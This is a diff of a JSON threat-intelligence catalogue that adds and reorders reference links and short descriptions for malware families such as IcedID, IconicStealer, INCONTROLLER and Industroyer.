- "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
- "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
- "https://ceriumnetworks.com/threat-of-the-month-icedid-malware/",
- "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/",
- "https://www.ironnet.com/blog/ransomware-graphic-blog",
- "https://matth.dmz42.org/posts/2022/automatically-unpacking-icedid-stage1-with-angr/",
- "https://thedfirreport.com/2022/04/25/quantum-ransomware/",
- "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure",
- "https://forensicitguy.github.io/analyzing-icedid-document/",
- "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://unit42.paloaltonetworks.com/atoms/monsterlibra/",
+ "https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/",
+ "https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion",
+ "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://drive.google.com/file/d/1jB0CsDvAADSrBeGxoi5gzyx8eQIiOJ2G/view",
"https://www.splunk.com/en_us/blog/security/detecting-icedid-could-it-be-a-trickbot-copycat.html",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
- "https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html",
+ "https://isc.sans.edu/diary/29740",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol",
+ "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
"https://github.com/f0wl/deICEr",
- "https://cert.gov.ua/article/39609",
- "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
- "https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2",
- "https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/",
+ "https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f",
+ "https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/",
+ "https://eln0ty.github.io/malware%20analysis/IcedID/",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-targeted-for-icedid-reply-chain-hijacking-attacks/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://thedfirreport.com/2022/04/25/quantum-ransomware/",
+ "https://blog.group-ib.com/prometheus-tds",
+ "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/",
"https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
"https://www.silentpush.com/blog/malicious-infrastructure-as-a-service",
- "https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/",
- "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
- "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/",
- "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/",
- "https://isc.sans.edu/diary/rss/28934",
+ "https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing",
+ "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
+ "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
+ "https://github.com/telekom-security/icedid_analysis",
+ "https://research.loginsoft.com/threat-research/icedid-malware-traversing-through-its-various-incarnations/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://www.ironnet.com/blog/ransomware-graphic-blog",
+ "https://twitter.com/embee_research/status/1592067841154756610?s=20",
+ "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
+ "https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344",
+ "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html",
+ "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html",
+ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
+ "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
"https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/",
+ "https://malwation.com/icedid-malware-technical-analysis-report/",
+ "https://www.youtube.com/watch?v=YEqLIR6hfOM",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
+ "https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2",
+ "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/",
+ "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.binarydefense.com/icedid-gziploader-analysis/",
+ "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
+ "https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan",
+ "https://intel471.com/blog/malvertising-surges-to-distribute-malware",
+ "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/",
+ "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b",
+ "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/",
+ "https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
+ "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
+ "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html",
+ "https://twitter.com/felixw3000/status/1521816045769662468",
+ "https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html",
+ "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/",
+ "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/",
+ "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
+ "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1",
+ "https://nikpx.github.io/malware/analysis/2022/03/09/BokBot",
+ "https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://forensicitguy.github.io/analyzing-icedid-document/",
+ "https://matth.dmz42.org/posts/2022/automatically-unpacking-icedid-stage1-with-angr/",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
+ "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/",
+ "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders",
+ "https://www.group-ib.com/blog/icedid",
+ "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
+ "https://thedfirreport.com/2021/05/12/conti-ransomware/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
+ "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/",
+ "https://www.bleepingcomputer.com/news/security/hackers-target-ukrainian-govt-with-icedid-malware-zimbra-exploits/",
+ "https://ceriumnetworks.com/threat-of-the-month-icedid-malware/",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://dshield.org/diary/Recent+IcedID+Bokbot+activity/29740/",
+ "https://cert.gov.ua/article/39609",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ",
+ "https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id",
+ "https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
+ "https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/",
+ "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html",
+ "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes",
+ "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/",
+ "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html",
+ "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://www.elastic.co/security-labs/icedids-network-infrastructure-is-alive-and-well",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes"
+ "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure",
+ "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/",
+ "https://www.youtube.com/watch?v=oZ4bwnjcXWg",
+ "https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/",
+ "https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/",
+ "https://twitter.com/Unit42_Intel/status/1645851799427874818",
+ "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917",
+ "https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
+ "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid",
+ "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary",
+ "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html",
+ "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
+ "https://www.team-cymru.com/post/from-chile-with-malware",
+ "https://www.trendmicro.com/en_ie/research/22/l/icedid-botnet-distributors-abuse-google-ppc-to-distribute-malware.html",
+ "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766",
+ "https://www.youtube.com/watch?v=7Dk7NkIbVqY",
+ "https://www.youtube.com/watch?v=wMXD4Sv1Alw",
+ "https://tccontre.blogspot.com/2021/01/",
+ "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims",
+ "https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/",
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://www.netresec.com/?page=Blog&month=2022-10&post=IcedID-BackConnect-Protocol",
+ "https://netresec.com/?b=214d7ff",
+ "https://www.netresec.com/?page=Blog&month=2023-02&post=How-to-Identify-IcedID-Network-Traffic",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://www.socinvestigation.com/icedid-banking-trojan-returns-with-new-ttps-detection-response/",
+ "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html",
+ "https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros",
+ "https://isc.sans.edu/diary/28636",
+ "https://blog.reconinfosec.com/an-encounter-with-ta551-shathak",
+ "https://www.elastic.co/security-labs/unpacking-icedid",
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return",
+ "https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf",
+ "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html",
+ "https://isc.sans.edu/diary/rss/28934",
+ "https://www.youtube.com/watch?v=wObF9n2UIAM",
+ "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
+ "https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884",
+ "https://blog.minerva-labs.com/icedid-maas",
+ "https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back"
],
"synonyms": [
"BokBot",
@@ -27071,9 +28630,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader",
+ "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
"http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
- "https://threatray.com/blog/a-new-icedid-gziploader-variant/",
- "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/"
+ "https://threatray.com/blog/a-new-icedid-gziploader-variant/"
],
"synonyms": [],
"type": []
@@ -27086,12 +28645,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
- "http://www.kz-cert.kz/page/502",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
+ "http://www.kz-cert.kz/page/502",
+ "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko"
],
"synonyms": [
"Fucobha"
@@ -27119,10 +28678,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix",
- "https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/",
"https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus",
- "https://securelist.com/ice-ix-not-cool-at-all/29111/"
+ "https://securelist.com/ice-ix-not-cool-at-all/29111/",
+ "https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/"
],
"synonyms": [],
"type": []
@@ -27143,6 +28702,23 @@
"uuid": "4f7ae3da-948c-4f74-8229-d5d7461f9c7d",
"value": "IconDown"
},
+ {
+ "description": "Follow-up payload in 3CX supply chain incident, which according to Volexity is an infostealer collecting information about the system and browser using an embedded copy of the SQLite3 library.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.iconic_stealer",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack",
+ "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise",
+ "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack",
+ "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/",
+ "https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "24fed92f-7e8f-449f-857f-d409d3bf8b48",
+ "value": "IconicStealer"
+ },
{
"description": "",
"meta": {
@@ -27175,10 +28751,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/",
+ "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf",
"https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf",
"https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/",
- "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf"
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/"
],
"synonyms": [],
"type": []
@@ -27206,8 +28782,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab",
- "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east"
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
+ "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east"
],
"synonyms": [],
"type": []
@@ -27220,16 +28796,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
- "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/",
- "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america",
- "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/",
+ "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
+ "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/",
"https://www.politie.nl/nieuws/2021/mei/19/04-aanhouding-in-onderzoek-naar-cybercrime.html",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt"
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/"
],
"synonyms": [],
"type": []
@@ -27250,6 +28826,20 @@
"uuid": "5f688e85-5f33-4ae6-880a-fc2e5146dd28",
"value": " Immortal Stealer"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.incontroller",
+ "https://www.mandiant.com/resources/blog/cyber-operations-russian-vulkan",
+ "https://twitter.com/silascutler/status/1514366443277766656"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3ed3e880-1b93-4ca2-9e9d-0e429c4c895f",
+ "value": "INCONTROLLER"
+ },
{
"description": "Keylogger written in Visual Basic dating back to at least 2012.",
"meta": {
@@ -27296,26 +28886,27 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer",
- "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
"https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf",
- "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/",
- "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf",
- "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
- "https://en.wikipedia.org/wiki/Industroyer",
- "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
- "https://cert.gov.ua/article/39518",
- "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/",
- "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
- "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf",
- "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
- "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
"https://www.secureworks.com/research/threat-profiles/iron-viking",
- "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf"
+ "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf",
+ "https://cert.gov.ua/article/39518",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
+ "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
+ "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/",
+ "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
+ "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf",
+ "https://en.wikipedia.org/wiki/Industroyer",
+ "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
+ "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
+ "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too"
],
"synonyms": [
"Crash",
@@ -27331,24 +28922,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer2",
- "https://www.netresec.com/?page=Blog&month=2022-04&post=Industroyer2-IEC-104-Analysis",
- "https://blog.scadafence.com/industroyer2-attack",
- "https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
- "https://www.nozominetworks.com/blog/industroyer2-nozomi-networks-labs-analyzes-the-iec-104-payload/",
- "https://pylos.co/2022/04/23/industroyer2-in-perspective/",
- "https://cert.gov.ua/article/39518",
- "https://www.mandiant.com/resources/industroyer-v2-old-malware-new-tricks",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
